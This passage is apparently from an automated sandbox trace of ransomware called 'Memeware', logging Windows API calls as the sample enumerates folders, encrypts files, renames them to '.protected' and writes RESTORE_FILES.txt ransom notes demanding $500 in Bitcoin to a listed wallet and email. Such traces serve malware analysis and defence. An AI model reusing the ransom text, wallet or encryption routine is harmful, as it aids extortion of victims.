Files\\Content.IE5\\VB18B0KB\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.933] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\..") returned 101 [0086.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.933] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.933] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.934] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.934] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.934] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.935] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.936] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.936] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.937] CloseHandle (hObject=0x154) returned 1 [0086.937] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.protected") returned 120 [0086.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini.protected")) returned 1 [0086.938] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.938] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\RESTORE_FILES.txt") returned 116 [0086.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.939] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.939] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.940] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.940] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.940] CloseHandle (hObject=0x150) returned 1 [0086.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Windows") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Program Files") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Program Files (x86)") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="$Recycle.bin") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="System Volume Information") returned 1 [0086.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9") returned 98 [0086.940] lstrcmpW (lpString1="XT1RPYG9", lpString2=".") returned 1 [0086.940] lstrcmpW (lpString1="XT1RPYG9", lpString2="..") returned 1 [0086.940] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\*") returned 100 [0086.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.941] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.941] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\.") returned 100 [0086.941] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.941] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.941] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.941] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.941] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\..") returned 101 [0086.941] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.941] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.941] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.941] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.942] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.942] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.942] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.942] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.942] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.942] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.943] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.943] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.943] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.944] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.944] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.944] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.944] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.945] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.945] CloseHandle (hObject=0x154) returned 1 [0086.945] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.protected") returned 120 [0086.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini.protected")) returned 1 [0086.946] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.946] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.946] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\RESTORE_FILES.txt") returned 116 [0086.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.947] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.947] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.948] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.948] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.948] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.948] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.948] CloseHandle (hObject=0x150) returned 1 [0086.948] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.948] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.948] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RESTORE_FILES.txt") returned 107 [0086.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.949] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our 